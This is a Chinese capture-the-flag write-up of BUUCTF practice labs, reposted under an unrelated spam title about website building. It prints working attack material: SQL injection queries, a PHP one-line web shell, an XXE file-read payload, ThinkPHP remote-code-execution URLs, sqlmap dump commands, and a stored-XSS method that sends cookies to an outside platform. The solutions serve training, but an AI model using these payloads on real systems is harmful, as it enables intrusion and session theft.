淮安做网站找哪家好快速网站建设
- 作者: 五速梦信息网
- 时间: 2026年03月21日 10:51
当前位置: 首页 > news >正文
淮安做网站找哪家好,快速网站建设,农业做的好的网站,天津网站建设公司推荐文章目录 1. Linux Labs 【SSH连接漏洞】2. BUU LFI COURSE【文件包含漏洞】3. BUU BRUTE【暴力破解用户名密码】4. BUU SQL COURSE【SQL注入-当前数据库】5. Upload-Labs-Linux 1【文件上传漏洞】7. Buu Upload Course 1【文件上传包含漏洞】8. sqli-labs 1【SQL注入-服务器上… 文章目录 1. Linux Labs 【SSH连接漏洞】2. BUU LFI COURSE【文件包含漏洞】3. BUU BRUTE【暴力破解用户名密码】4. BUU SQL COURSE【SQL注入-当前数据库】5. Upload-Labs-Linux 1【文件上传漏洞】7. Buu Upload Course 1【文件上传包含漏洞】8. sqli-labs 1【SQL注入-服务器上的其他数据库】9. BUU BURP COURSE 1【IP伪造漏洞】10. BUU XXE COURSE 1 【XXE漏洞】11 LFI labs【文件包含漏洞】12 BUU XSS COURSE 1【XSS漏洞-窃取cookie】13 AWD Test 1【ThinkPHP框架漏洞】15 AWD Test2 【SQL注入-万能密码】16 BUU SQL COURSE 2【SQL注入-sqlmap使用】17 [Windows]Upload-Labs-Windows【文件上传漏洞-基础】18 XSS labs【XSS-基础】 1. Linux Labs 【SSH连接漏洞】 题目给出了ssh连接的用户名密码考察 ssh 连接主机主机 IP 地址可以通过ping域名获得端口要改成靶机的端口不是默认的22。 连接远程主机后即可找到 flag 文件。
- BUU LFI COURSE【文件包含漏洞】
题目是一段PHP代码看出来存在文件包含漏洞只要传入文件名就会将文件内容展示出来。可以盲目猜一猜 flag 的文件名
- BUU BRUTE【暴力破解用户名密码】
一道爆破题burpsuite 爆破用户名密码即可。注意下请求过快会报 429可以尝试减小线程数增加延时。
- BUU SQL COURSE【SQL注入-当前数据库】 这是一道SQL注入的题可以看到地址栏输入 1 2 3 可以得到不同的显示结果尝试判断注入点 1输入下列语句发现第一个有结果第二个没结果说明是数值型且可以注入 and 11 and 12 2输入下列语句查找数据库名称如果字段数不对可以再多试试得到数据库为 news union select 1,database()–3输入下列语句查找表名得到两张表 amdin 和 contents union select 1,group_concat(table_name) from information_schema.tables where table_schemanews4输入下列语句查找 admin 表中的字段名得到 idusernamepassword union select 1,group_concat(column_name) from information_schema.columns where table_nameadmin5知道了表名和字段名就可以查找表中的数据了这里我们要找登录用户找到后登录即可拿到 flag union select username,password from admin5. Upload-Labs-Linux 1【文件上传漏洞】 文件上传漏洞上传一个php一句话木马文件返回了文件的访问路径再用蚁剑连接即可在根目录找到flag。
- Buu Upload Course 1【文件上传包含漏洞】 这个也是文件上传漏洞上传一个木马文件发现无论上传什么都会被重命名为 jpg 文件 ?php eval($_POST[cmd]); echo hello?2. 本来这样是没啥办法的但是我们访问这个木马文件发现这个文件其实是被执行了输出了 hello 3. 所以这个其实是一个文件包含漏洞只有文件包含漏洞才能将我们的 jpg 文件当作代码执行所以还是直接用蚁剑访问这个木马文件即可连接找到 flag。
- sqli-labs 1【SQL注入-服务器上的其他数据库】 按照第 4 题类似的方式注入查找当前数据库 security发现所有表里都没有 flag。查找当前服务器上其他数据库 unionselect1,2,group_concat(schema_name)frominformation_schema.schemata–发现有个 ctftraining 数据库查找该数据库下的表果然找到了有个 flag表该表里有个flag字段。但注意后续查找 flag 的值需要带上数据库名否则还会在当前数据库中查找就查不到了 unionselect1,2,flagfromctftraining.flag–9. BUU BURP COURSE 1【IP伪造漏洞】 访问地址发现说只能本地访问使用 bp 拦截请求添加以下header头 X-Real-IP: 127.0.0.1 Content-Length: 0然后出现一个登录页面 拦截该登录请求同样添加X-Real-IP: 127.0.0.1 登录成功返回 flag。
- BUU XXE COURSE 1 【XXE漏洞】
XXE漏洞参考https://zhuanlan.zhihu.com/p/689906749
随便输入一个用户名密码发现请求参数是 XML 格式的且返回输入的 admin 值 可能存在 XXE 漏洞。
XML 外部实体注入也称为 XXE是一种 Web 安全漏洞允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件并与应用程序本身可以访问的任何后端或外部系统进行交互。XXE漏洞发生在应用程序解析XML输入时没有禁止外部实体的加载导致可加载恶意外部文件和代码造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。
构造 XML 实体来读取 flag
?xml version1.0 encodingUTF-8?
!DOCTYPE root[
!ENTITY a SYSTEM file:///flag
]
rootusernamea;/usernamepassword1/password
/root这里可能需要猜测一下 flag 所处的位置。结果返回 flag
11 LFI labs【文件包含漏洞】 文件包含漏洞 看提示需要输入文件名输入/flag返回 flag
12 BUU XSS COURSE 1【XSS漏洞-窃取cookie】 XSS 漏洞。这是一个留言板留言以后会返回留言保存的位置 注入 XSSscriptalert(flag)/script但是没有成功查看返回结果原来是被转义了 尝试其他注入input onclickalert(xss);可以注入成功。同样 img 标签也可以成功。 现在的问题在于如何通过这个漏洞获取flagXSS一般都是用来窃取cookie的我们使用免费的 XSS 平台通过xss漏洞将cookie窃取发到这个免费的 xss 平台上。登录免费的XSS平台 https://xssaq.com/首先创建一个项目勾选以下两项 出来一些示例代码选取 img 标签的代码提交到输入框中: 由于本 XSS 漏洞为存储型漏洞当有人访问我们提交的这个吐槽时就会自动将其 cookie 发送到我们的 XSS 平台上。去项目内容看看果然有一条 cookie 消息 直接访问这个后台地址 backend/admin.php发现显示未登录 拦截该请求替换成管理员的 cookie成功获取到了 flag
13 AWD Test 1【ThinkPHP框架漏洞】 方式一给出了ssh连接的用户名密码通过 ssh 远程连接即可。 方式二 启动靶机是一个简陋的网页随便点点出现了以下页面 说明网站使用的是 ThinkPHP框架且知道了其版本号。去查查这个框架存在的漏洞发现有远程代码执行漏洞 且可以查到漏洞的利用方法即构造以下payload可获取php配置文件?s/Index/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]-1 输入上述payload果然返回了 php 配置信息 phpinfo 没啥有用的构造以下 payload 还可以执行命令 注意 id 就是我们要执行的命令行代码这里我们 ls 查看根目录的文件?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls%20/ 发现有个 flag 和 flag.txt 5. 查看该 flag.txt 提交后不对查看 flagflag 正确。 payload 为 ?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]cat%20/flag 15 AWD Test2 【SQL注入-万能密码】 给出了ssh连接的用户名密码通过 ssh 远程连接即可。如果使用网页登录登录可尝试万能密码 admin or 1# 16 BUU SQL COURSE 2【SQL注入-sqlmap使用】 SQL 注入的题看选择一条新闻标题会展示一条新闻可以从此处着手 开始在地址栏里尝试注入了好多次都没成功后来才发现不应该直接在地址栏注入。打开F12发现点击新闻时会发送一个隐藏的url这个才是真正的注入点 按照之前的方式尝试注入可以注入成功不细讲。这里介绍使用 sqlmap 的使用方式通过sqlmap实现注入。 //获取所有数据库 python sqlmap.py -u URL –dbs //获取当前数据库 python sqlmap.py -u URL –current-db //获取表名(如果不指定数据库将默认获取所有库的表名) python sqlmap.py -u URL -D 数据库名 –tabls //获取字段名 python sqlmap.py -u URL -D 数据库名 -T 表名 –columns //获取值 sqlmap -u URL -D 数据库名 -T 表名 -C 字段1,字段2,… –dump依次爆出数据库名、表名、字段名获取值即可python sqlmap.py -u http://c9f858c4-097b-4614-afc0-6dfb99111e10.node5.buuoj.cn:81/backend/content_detail.php?id1 -D ctftraining -T flag -C flag –dump 17 [Windows]Upload-Labs-Windows【文件上传漏洞-基础】 文件上传漏洞前端校验图片类型burpsuite 改文件后缀即可绕过成功上传一句话木马并且返回了文件路径。但是用蚁剑连接时报错不知道啥问题。 18 XSS labs【XSS-基础】 一直让做 xss-labs 的题攻破到第八关还没得到flag不想做了。
- 上一篇: 淮安住房与城乡建设部网站网站右侧二维码代码
- 下一篇: 淮安做微信网站做外卖系统哪家网站做的好
相关文章
-
淮安住房与城乡建设部网站网站右侧二维码代码
淮安住房与城乡建设部网站网站右侧二维码代码
- 技术栈
- 2026年03月21日
-
淮安住房与城乡建设部网站seo网页优化平台
淮安住房与城乡建设部网站seo网页优化平台
- 技术栈
- 2026年03月21日
-
淮安网站seowordpress+小说系统
淮安网站seowordpress+小说系统
- 技术栈
- 2026年03月21日
-
淮安做微信网站做外卖系统哪家网站做的好
淮安做微信网站做外卖系统哪家网站做的好
- 技术栈
- 2026年03月21日
-
淮北矿业工程建设有限公司网站重庆网站设计费用
淮北矿业工程建设有限公司网站重庆网站设计费用
- 技术栈
- 2026年03月21日
-
淮北哪里做网站手机qq浏览器网页安全防护怎么关
淮北哪里做网站手机qq浏览器网页安全防护怎么关
- 技术栈
- 2026年03月21日
